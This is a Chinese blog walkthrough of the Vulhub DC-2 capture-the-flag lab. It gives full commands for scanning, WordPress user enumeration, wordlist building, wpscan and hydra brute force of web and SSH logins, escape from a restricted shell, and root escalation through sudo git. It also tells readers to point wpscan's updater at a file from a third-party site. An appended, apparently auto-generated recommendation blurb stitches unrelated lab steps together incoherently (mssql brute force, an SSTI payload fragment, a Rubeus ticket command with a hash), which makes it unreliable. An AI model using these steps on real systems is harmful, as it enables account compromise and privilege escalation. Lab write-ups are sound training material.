Vulhub-DC-2靶场通关攻略

arp-scan -l

nmap -sV -p- 192.168.109.140

也可以执行如下命令 可以探测目标主机是否存活
nmap -T4 -sP 192.168.109.140

也可以尝试如下的命令  -A是主动扫描 -p设置的是端口  -oN可以把结果输出到文件 结果保存在root目标下
nmap -T4 -A 192.168.109.140 -p 1-65535 -oN haha.txt
想要访问可以进入如下目录
C:\Windows\System32\drivers\etc\hosts
kali中的hosts文件也需要修改 增加如下记录
/etc/hosts

进入网页后 这个 wordpress的cms网站 这个网站除去漏洞 还是非常优秀的
此时直接访问相应的ip地址就可以直接访问相应的网站了  输入dc-2也可以
修改完hosts文件 然后可以访问以后 接下来可以尝试对其进行扫描  -o表示可以输出到一个文件中 -h后面可以写能被解析的域名 也可以直接写ip地址
nikto -h dc-2 -o nihao.txt
发现了/wp-login.php  直接访问进入一个用户名和密码的登录位置
http://dc-2/wp-login.php

接下来我们需要扫描发现wordpress的用户
wpscan --url dc-2 -e u
(接下来是软件数据库更新问题的解决部分)
可以先下载包到本地
wget http://blog.dsb.ink/wpscan/wp.zip
mv wp.zip /var/www/html/
如果kali无法直接下载 可以windows直接访问 http://blog.dsb.ink/wpscan/wp.zip 再把这个文件放到/var/www/html下
cd /var/www/html
unzip wp.zip
dpkg -L wpscan | grep updater
/usr/share/rubygems-integration/all/gems/wpscan-3.8.1/lib/wpscan/db/updater.rb
vim /usr/share/rubygems-integration/all/gems/wpscan-3.8.1/lib/wpscan/db/updater.rb
按住shift+冒号 然后输入 set number回车 之后我们找到81行
之后我们改成本机地址 
接下来重启服务
service apache2 start
然后再去更新  就可以更新成功了
wpscan --update
之后再继续刚才的操作
wpscan --url dc-2 -e u
扫描到了三个用户 admin jerry tom
根据flag1的提示 提示我们使用软件 cewl    会搜集可能的密码 行文习惯等
cewl dc-2 -w pass.txt
vi username.txt

此时用户名和密码都到位了 
接下来可以 用工具 可以专门用来破解wordpress
其会自动定位到后台的登录地址 并进行穷举破解wordpress模板的用户名和密码
wpscan --url dc-2 -U username.txt -P pass.txt
其实也可以使用神器burpsuite进行破解
接下来我们可以通过账户和密码尝试进行登录
Tom的账户登录以后并没有什么内容 所以就不做演示了
接下来既然有字典 不妨再使用工具hydra对ssh的密码进行一下穷举破解 看会不会有意外收获
而且此时ssh的端口不是默认的22  已经被管理员修改了 所以需要-s指定端口
hydra -L username.txt -P pass.txt 192.168.109.140 ssh -s 7744
穷举成功获得ssh密码
接下来可以尝试登录ssh
ssh tom@192.168.109.140 -p 7744
ls
发现权限不够 连cat都用不了
接下来要尝试提权
echo $PATH   #看一下自己是什么命令行
ls usr/bin  #确定一下自己可以使用什么命令
vi flag3.txt
根据提示 接下来要使用su进行提权
以下命令  按下键盘的a 就可以调用/bin/sh命令行
BASH_CMDS[a]=/bin/sh
发现依然被禁用掉了
接下来可以使用终极命令:  把高级权限的命令行也加到自己的path中
此时就可以使用cat了
export PATH=PATH:/bin
export PATH=PATH:/sbin:/bin
可以尝试提权到jerry  
PS:经过尝试jerry的账户没有办法被直接ssh登录 但是通过tom的账户su后输入密码就可以成功切换账户
su jerry
#adipiscing
cd ~    #回到自己的home目录
sudo -l  #查看可以以root权限使用什么命令
git提权  git在查看帮助文档的时候是可以敲命令的  在下面变白以后  命令前面加个感叹号即可
sudo git -p --help  #这条命令有时候不能用
sudo git help config
此时已经提权到root了 可以执行root权限了
本质是借用git的root权限执行命令
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
为了通关ssti-lab靶场,你可以按照以下步骤进行操作: 1. 首先,从上一个数据库中找到的password字典中获取到mssql的账户密码。 2. 使用这个账户密码进行mssql的暴力破解,以获得访问权限。 3. 一旦你获得了访问权限,你可以使用SSTI有效载荷发生器来执行特定类型的Java SSTI攻击。该有效载荷发生器可以生成针对Java SSTI的payload,启发于${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99)...}。 4. 另外,你还可以使用Rubeus工具来申请访问自身的可转发服务票据。通过运行命令".\Rubeus.exe asktgt /user:MSSQLSERVER$ /rc4:bd2cf5e6a8f89ed5b02d3d7fcf5e88c7 /domain:xiaorang.lab /dc:DC.xiaorang.lab /nowrap > 1.txt",你可以生成一个可转发的服务票据文件,以便在后续攻击中使用。 通过以上步骤,你可以成功通关ssti-lab靶场。请注意,在进行任何攻击前,确保你有合法的授权和使用权,并且遵守法律法规。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [WP-春秋云镜-Brute4Road靶场通关完全指南](https://blog.csdn.net/qq_45234543/article/details/128482984)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* [ssti-payload:SSTI有效载荷生成器](https://download.csdn.net/download/weixin_42128558/15099898)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Simon_Smith

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值